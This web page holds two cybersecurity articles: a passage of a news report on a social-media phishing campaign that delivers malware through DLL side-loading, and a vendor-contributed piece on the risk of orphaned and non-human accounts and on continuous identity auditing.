The use of DLL side-loading has become an increasingly common technique adopted by threat actors to evade detection and conceal signs of malicious activity by taking advantage of legitimate processes. Over the past week, at least three documented campaigns have leveraged DLL side-loading to deliver malware families tracked as LOTUSLITE and PDFSIDER , along with other commodity trojans and information stealers . In the campaign observed by ReliaQuest, the sideloaded DLL is used to drop the Python interpreter onto the system and create a Windows Registry Run key that makes sure that the Python interpreter is automatically executed upon every login. The interpreter’s primary responsibility is to execute a Base64-encoded open-source shellcode that’s directly executed in memory to avoid leaving forensic artifacts on disk.
The final payload attempts to communicate with an external server, granting the attackers persistent remote access to the compromised host and exfiltrating data of interest. The abuse of legitimate open-source tools, coupled with the use of phishing messages sent on social media platforms, shows that phishing attacks are not confined to emails alone and that alternative delivery methods can exploit security gaps to increase the odds of success and break into corporate environments. ReliaQuest told The Hacker News that the campaign appears to be broad and opportunistic, with activity spanning various sectors and regions. “That said, because this activity plays out in direct messages, and social media platforms are typically less monitored than email, it’s difficult to quantify the full scale,” it added.
“This approach allows attackers to bypass detection and scale their operations with minimal effort while maintaining persistent control over compromised systems,” the cybersecurity company said. “Once inside, they can escalate privileges, move laterally across networks, and exfiltrate data.” This is not the first time LinkedIn has been misused for targeted attacks. In recent years, multiple North Korean threat actors , including those linked to the CryptoCore and Contagious Interview campaigns, have singled out victims by contacting them on LinkedIn under the pretext of a job opportunity and convincing them to run a malicious project as part of a supposed assessment or code review. In March 2025, Cofense also detailed a LinkedIn-themed phishing campaign that employs lures related to LinkedIn InMail notifications to get recipients to click on a “Read More” or “Reply To” button and download the remote desktop software developed by ConnectWise for gaining complete control over victim hosts.
“Social media platforms commonly used by businesses represent a gap in most organizations’ security posture,” ReliaQuest said. “Unlike email, where organizations tend to have security monitoring tools, social media private messages lack visibility and security controls, making them an attractive delivery channel for phishing campaigns.” “Organizations must recognize social media as a critical attack surface for initial access and extend their defenses beyond email-centric controls.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
The Hidden Risk of Orphan Accounts
The Problem: The Identities Left Behind As organizations grow and evolve, employees, contractors, services, and systems come and go - but their accounts often remain. These abandoned or “orphan” accounts sit dormant across applications, platforms, assets, and cloud consoles. The reason they persist isn’t negligence - it’s fragmentation. Traditional IAM and IGA systems are designed primarily for human users and depend on manual onboarding and integration for each application - connectors, schema mapping, entitlement catalogs, and role modeling.
Many applications never make it that far. Meanwhile, non-human identities (NHIs): service accounts, bots, APIs, and agent-AI processes are natively ungoverned, operating outside standard IAM frameworks and often without ownership, visibility, or lifecycle controls. The result? A shadow layer of untracked identities forming part of the broader identity dark matter - accounts invisible to governance but still active in infrastructure.
Why They’re Not Tracked Integration Bottlenecks: Every app requires a unique configuration before IAM can manage it. Unmanaged and local systems are rarely prioritized. Partial Visibility: IAM tools see only the “managed” slice of identity - leaving behind local admin accounts, service identities, and legacy systems. Complex Ownership: Turnover, mergers, and distributed teams make it unclear who owns which application or account.
AI-Agents and Automation: Agent-AI introduces a new category of semi-autonomous identities that act independently from their human operators, further breaking the IAM model. Learn more about IAM shortcuts and the impacts that accompany them visit . The Real-World Risk Orphan accounts are the unlocked back doors of the enterprise. They hold valid credentials, often with elevated privileges, but no active owner.
Attackers know this and use them. Colonial Pipeline (2021)
- attackers entered via an old/inactive VPN account with no MFA. Multiple sources corroborate the “inactive/legacy” account detail. Manufacturing company hit by Akira ransomware (2025)
- breach came through a “ghost” third-party vendor account that wasn’t deactivated (i.e., an orphaned/vendor account).
SOC write-up from Barracuda Managed XDR. M&A context
- during post-acquisition consolidation, it’s common to discover thousands of stale accounts/tokens; Enterprises note orphaned (often NHI) identities as a persistent post-M&A threat, citing very high rates of still-active former employee tokens. Orphan accounts fuel multiple risks: Compliance exposure: Violates least-privilege and deprovisioning requirements (ISO 27001, NIS2, PCI DSS, FedRAMP). Operational inefficiency: Inflated license counts and unnecessary audit overhead.
Incident response drag: Forensics and remediation slow down when unseen accounts are involved. The Way Forward: Continuous Identity Audit Enterprises need evidence, not assumptions. Eliminating orphan accounts requires full identity observability - the ability to see and verify every account, permission, and activity, whether managed or not. Modern mitigation includes: Identity Telemetry Collection: Extract activity signals directly from applications, managed and unmanaged.
Unified Audit Trail: Correlate joiner/mover/leaver events, authentication logs, and usage data to confirm ownership and legitimacy. Role Context Mapping: File real usage insights and privilege context into identity profiles - showing who used what, when, and why. Continuous Enforcement: Automatically flag or decommission accounts with no activity or ownership, reducing risk without waiting for manual reviews. When this telemetry feeds into a central identity audit layer, it closes the visibility gap, turning orphan accounts from hidden liabilities into measurable, managed entities.
To learn more, visit Audit Playbook: Continuous Application Inventory Reporting . The Orchid Perspective Orchid’s Identity Audit capability delivers this foundation. By combining application-level telemetry with automated audit collection, it provides verifiable, continuous insight into how identities - human, non-human, and agent-AI - are actually used. It’s not another IAM system; it’s the connective tissue that ensures IAM decisions are based on evidence, not estimation.
Note: This article was written and contributed by Roy Katmor , CEO of Orchid Security . Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.